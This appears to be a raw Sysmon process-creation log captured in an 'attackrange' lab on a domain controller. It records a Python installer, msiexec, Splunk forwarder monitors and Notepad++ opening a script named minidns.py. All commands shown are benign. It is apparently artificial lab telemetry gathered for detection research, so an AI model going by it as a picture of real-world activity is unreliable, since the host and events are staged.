runpy.run_module(\"pip\", run_name=\"__main__\", alter_sys=True) "C:\Windows\SysWOW64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-4FAC-6078-1007-00000000AE01}3208C:\Program Files\Python38\python.exe"C:\Program Files\Python38\python.exe" -E -s -m ensurepip -U --default-pip 154100x800000000000000037714Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:32.991{A8622C2F-4FAC-6078-1007-00000000AE01}3208C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exe"C:\Program Files\Python38\python.exe" -E -s -m ensurepip -U --default-pipC:\Windows\SysWOW64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-4FAC-6078-0F07-00000000AE01}7060C:\Windows\SysWOW64\msiexec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A9A4E6E1AB8EB7015F3DEE8A6A4D4540 154100x800000000000000037704Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:32.857{A8622C2F-4FAC-6078-0F07-00000000AE01}7060C:\Windows\SysWOW64\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A9A4E6E1AB8EB7015F3DEE8A6A4D4540C:\Windows\SysWOW64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0BDEAEA7BB4AE7822416CD37EA8EE00D,SHA256=5C188CE4E21FAB002B4D669F91FA19341AB4260F83D798FDAC53229D675DB6BA,IMPHASH=B4730776DFCE61DBCD10D002E3D530E1{A8622C2F-4F9E-6078-0707-00000000AE01}616C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /V 
154100x800000000000000037310Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:22.956{A8622C2F-4FA2-6078-0C07-00000000AE01}5508C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000037253Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:21.310{A8622C2F-4FA1-6078-0B07-00000000AE01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000037238Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:20.597{A8622C2F-4FA0-6078-0A07-00000000AE01}2352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000037168Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:19.926{A8622C2F-4F9F-6078-0807-00000000AE01}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000037069Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:18.449{A8622C2F-4F9E-6078-0707-00000000AE01}616C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\system32\msiexec.exe /VC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9,IMPHASH=18A9F87944C357EB02511FDF4A18E19B{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x800000000000000037044Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:18.237{A8622C2F-4F9E-6078-0607-00000000AE01}4664C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000037035Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:18.054{A8622C2F-4F9E-6078-0507-00000000AE01}3904C:\Windows\Temp\{18F4A599-FD78-4966-AC74-683EE580725A}\.be\python-3.8.9-amd64.exe3.8.9150.0Python 3.8.9 (64-bit)Python 3.8.9 (64-bit)Python Software Foundationpython-3.8.9-amd64.exe"C:\Windows\Temp\{18F4A599-FD78-4966-AC74-683EE580725A}\.be\python-3.8.9-amd64.exe" -q -burn.elevated BurnPipe.{A2C04021-BA92-4509-80B0-07B5D4271B07} {57D5E1F0-BB75-405D-915C-CE3CD6E1784F} 2872C:\Users\Administrator\Downloads\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C40433FA39A526D340B8C9289ECB8D03,SHA256=A25DA599FA29B647D8CFD7859507A5F22A6D4ECB8ADEC400119916125361E48E,IMPHASH=D7E2FD259780271687FFCA462B9E69B7{A8622C2F-4F90-6078-0207-00000000AE01}2872C:\Windows\Temp\{BA8896E4-BE04-422C-91EE-24052508D566}\.cr\python-3.8.9-amd64.exe"C:\Windows\Temp\{BA8896E4-BE04-422C-91EE-24052508D566}\.cr\python-3.8.9-amd64.exe" -burn.clean.room="C:\Users\Administrator\Downloads\python-3.8.9-amd64.exe" -burn.filehandle.attached=500 -burn.filehandle.self=504 154100x800000000000000037019Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:17.570{A8622C2F-4F9D-6078-0407-00000000AE01}5852C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control 
ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000037009Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:16.891{A8622C2F-4F9C-6078-0307-00000000AE01}5964C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036963Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:04.327{A8622C2F-4F90-6078-0207-00000000AE01}2872C:\Windows\Temp\{BA8896E4-BE04-422C-91EE-24052508D566}\.cr\python-3.8.9-amd64.exe3.8.9150.0Python 3.8.9 (64-bit)Python 3.8.9 (64-bit)Python Software Foundationpython-3.8.9-amd64.exe"C:\Windows\Temp\{BA8896E4-BE04-422C-91EE-24052508D566}\.cr\python-3.8.9-amd64.exe" -burn.clean.room="C:\Users\Administrator\Downloads\python-3.8.9-amd64.exe" -burn.filehandle.attached=500 -burn.filehandle.self=504 
C:\Users\Administrator\Downloads\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C40433FA39A526D340B8C9289ECB8D03,SHA256=A25DA599FA29B647D8CFD7859507A5F22A6D4ECB8ADEC400119916125361E48E,IMPHASH=D7E2FD259780271687FFCA462B9E69B7{A8622C2F-4F8F-6078-0107-00000000AE01}6656C:\Users\Administrator\Downloads\python-3.8.9-amd64.exe"C:\Users\Administrator\Downloads\python-3.8.9-amd64.exe" 154100x800000000000000036949Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:03.567{A8622C2F-4F8F-6078-0107-00000000AE01}6656C:\Users\Administrator\Downloads\python-3.8.9-amd64.exe3.8.9150.0Python 3.8.9 (64-bit)Python 3.8.9 (64-bit)Python Software Foundationpython-3.8.9-amd64.exe"C:\Users\Administrator\Downloads\python-3.8.9-amd64.exe" C:\Users\Administrator\Downloads\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F69D9C918A8AD06C71D7F0F26CCFEE12,SHA256=E15BC52914B6DAEE9630360BFE3708EE646D4E4CE34BF5368066213009AF70A6,IMPHASH=D7E2FD259780271687FFCA462B9E69B7{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000036619Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:36:22.941{A8622C2F-4F66-6078-FF06-00000000AE01}6204C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000036600Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:36:21.418{A8622C2F-4F65-6078-FE06-00000000AE01}5212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036591Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:36:20.749{A8622C2F-4F64-6078-FD06-00000000AE01}4268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036581Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:36:20.073{A8622C2F-4F64-6078-FC06-00000000AE01}4940C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036570Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:36:18.230{A8622C2F-4F62-6078-FB06-00000000AE01}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036560Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:36:17.561{A8622C2F-4F61-6078-FA06-00000000AE01}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000036551Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:36:16.886{A8622C2F-4F60-6078-F906-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036377Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:35:36.250{A8622C2F-4F38-6078-F606-00000000AE01}5444C:\Program Files\Notepad++\updater\GUP.exe5.13WinGup for Notepad++WinGup for Notepad++Don HO don.h@free.frgup.exe"C:\Program Files\Notepad++\updater\gup.exe" -v7.95 -px64C:\Program Files\Notepad++\updater\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=EA20C0550A753BF194FA02A52A0CB932,SHA256=70FF333305CE2C4FBD5C583B3158A2A083D784C0F8A3D2AE09D55568E19BCD7E,IMPHASH=0AC02220E25075D21D6FCE74AEF267AF{A8622C2F-4F38-6078-F506-00000000AE01}6896C:\Program Files\Notepad++\notepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\temp\minidns.py" 154100x800000000000000036364Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:35:36.019{A8622C2F-4F38-6078-F506-00000000AE01}6896C:\Program Files\Notepad++\notepad++.exe7.95Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" 
"C:\temp\minidns.py"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=45833E3CFFD3716546665DCE0C343F2E,SHA256=5AEC02154C9A23F5D77B11853691449063AA0EF3988C4EB30048DEBBCEC8B947,IMPHASH=DE4B8987D5ADB218127887FA4130E9E8{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000036334Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:35:22.918{A8622C2F-4F2A-6078-F406-00000000AE01}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036322Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:35:21.519{A8622C2F-4F29-6078-F306-00000000AE01}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000036312Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:35:20.852{A8622C2F-4F28-6078-F206-00000000AE01}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036303Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:35:20.181{A8622C2F-4F28-6078-F106-00000000AE01}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036293Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:35:18.282{A8622C2F-4F26-6078-F006-00000000AE01}5936C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036282Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:35:17.616{A8622C2F-4F25-6078-EF06-00000000AE01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036273Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:35:16.949{A8622C2F-4F24-6078-EE06-00000000AE01}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000036190Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:34:22.927{A8622C2F-4EEE-6078-ED06-00000000AE01}4568C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036171Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:34:21.581{A8622C2F-4EED-6078-EC06-00000000AE01}1824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036162Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:34:20.908{A8622C2F-4EEC-6078-EB06-00000000AE01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
